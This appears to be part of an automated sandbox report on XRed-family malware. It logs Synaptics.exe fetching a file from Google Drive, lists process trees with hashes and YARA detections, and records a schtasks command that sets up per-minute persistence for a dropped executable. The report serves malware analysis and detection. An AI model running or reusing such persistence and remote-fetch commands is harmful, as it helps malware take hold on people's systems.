                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:08 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4kiA2qeotdv_UzxtDj3ZIsSmrWZ8kfkfweN4vnP0rR6eh4cSyKLM2rZPXowDqUdcSZx5zn8vk
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:08 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-o-zF1mSrLikNBAMxffJiZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
2024-12-30 10:26:08 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:26:08 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="UFMa_eBfbSjsPdScl15pTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:26:08 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.9 | 49940 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:09 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.9 | 49941 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:09 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:09 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:09 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DJoVcXQt2GNb9uaXojHrqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.9 | 49942 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:09 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.9 | 49943 | 142.250.186.97 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:09 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.9 | 49944 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:26:10 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
2024-12-30 10:26:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:10 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pYJ7G9JKujtTqpvqzj8Cgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    149 | 192.168.2.9 | 49945 | 142.250.185.78 | 443 | 7464 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    2024-12-30 10:26:10 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:10 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-G-zCX6O1ingw_2vwQBH1VQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Target ID:0
                                                                                                                    Start time:05:25:09
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\LWQDFZ.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\LWQDFZ.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:1'686'528 bytes
                                                                                                                    MD5 hash:27BCC0D927E9F13250B1DFF9E122E9AF
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:05:25:10
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\Desktop\._cache_LWQDFZ.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\._cache_LWQDFZ.exe"
                                                                                                                    Imagebase:0x3a0000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.3037281317.00000000042E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 53%, ReversingLabs
                                                                                                                    Reputation:low
                                                                                                                    Has exited:false

                                                                                                                    Target ID:3
                                                                                                                    Start time:05:25:10
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:771'584 bytes
                                                                                                                    MD5 hash:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Avira
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:4
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x6a0000
                                                                                                                    File size:53'161'064 bytes
                                                                                                                    MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:5
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                                                                                                                    Imagebase:0xc50000
                                                                                                                    File size:236'544 bytes
                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:6
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff70f010000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:7
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                                                                                                                    Imagebase:0xaf0000
                                                                                                                    File size:187'904 bytes
                                                                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:8
                                                                                                                    Start time:05:25:13
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs
                                                                                                                    Imagebase:0x3c0000
                                                                                                                    File size:147'456 bytes
                                                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000008.00000002.3020785623.0000000003488000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000008.00000002.3022295381.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Target ID:9
                                                                                                                    Start time:05:25:15
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Antivirus matches:
                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                    • Detection: 53%, ReversingLabs
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:13
                                                                                                                    Start time:05:25:24
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:15
                                                                                                                    Start time:05:25:32
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                    Imagebase:0x400000
                                                                                                                    File size:771'584 bytes
                                                                                                                    MD5 hash:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:Borland Delphi
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:16
                                                                                                                    Start time:05:25:41
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:17
                                                                                                                    Start time:05:25:50
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:20
                                                                                                                    Start time:05:26:01
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                                                                                                                    Imagebase:0x670000
                                                                                                                    File size:914'944 bytes
                                                                                                                    MD5 hash:541FC19BE6471027AFB1DD324E4A8A80
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:23
                                                                                                                    Start time:05:26:11
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12448
                                                                                                                    Imagebase:0xe40000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:25
                                                                                                                    Start time:05:26:12
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12508
                                                                                                                    Imagebase:0xe40000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:27
                                                                                                                    Start time:05:26:31
                                                                                                                    Start date:30/12/2024
                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12500
                                                                                                                    Imagebase:0xe40000
                                                                                                                    File size:483'680 bytes
                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Has exited:true

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:4.3%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:10.7%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:40
103776 3acaee 48 API calls 103772->103776 103774 417820 103773->103774 103775 3b4543 103773->103775 104147 3fe713 413 API calls Mailbox 103774->104147 103970 3b4040 103775->103970 103783 3b45e4 Mailbox 103776->103783 103779 3b4639 Mailbox 103779->103269 103780 41782c 103780->103779 104148 3ed520 86 API calls 4 library calls 103780->104148 103782 3b4559 103782->103779 103782->103780 103782->103783 103789 401f19 132 API calls 103783->103789 103985 3f1080 103783->103985 103988 3f6fc3 103783->103988 103991 3f9500 103783->103991 104000 3eefcd 103783->104000 104034 3f90d3 103783->104034 104039 3bf55e 103783->104039 104048 3edce9 103783->104048 104053 3a50ec 103783->104053 104057 40352a 103783->104057 104145 3f95af WSAStartup 103783->104145 103789->103779 103795->103259 103796->103266 103797->103272 103798->103269 103799->103243 103801 3a84be 103800->103801 103815 3a84ba 103800->103815 103802 415592 __i64tow 103801->103802 103803 415494 103801->103803 103804 3a84d2 103801->103804 103810 3a84ea __itow Mailbox _wcscpy 103801->103810 103805 41557a 103803->103805 103806 41549d 103803->103806 104702 3c234b 80 API calls 2 library calls 103804->104702 104703 3c234b 80 API calls 2 library calls 103805->104703 103806->103810 103812 4154bc 103806->103812 103809 3c010a 48 API calls 103811 3a84f4 103809->103811 103810->103809 103814 3acaee 48 API calls 103811->103814 103811->103815 103813 3c010a 48 API calls 103812->103813 103816 4154d9 103813->103816 103814->103815 103815->103260 103817 3c010a 48 API calls 103816->103817 103818 4154ff 103817->103818 103818->103815 103819 3acaee 48 API calls 103818->103819 103819->103815 103820->103249 103857 3c010a 103821->103857 103823 3ad3f3 103824 3c010a 48 API calls 103823->103824 103825 3ad401 103824->103825 103825->103724 103827 3fcd21 103826->103827 103828 3fcd46 103826->103828 103829 3aca8e 48 API calls 103827->103829 103828->103735 103830 3fcd2d 103829->103830 103888 3fc8b7 103830->103888 103833 3a7ecf 103832->103833 103835 3a7e5f 
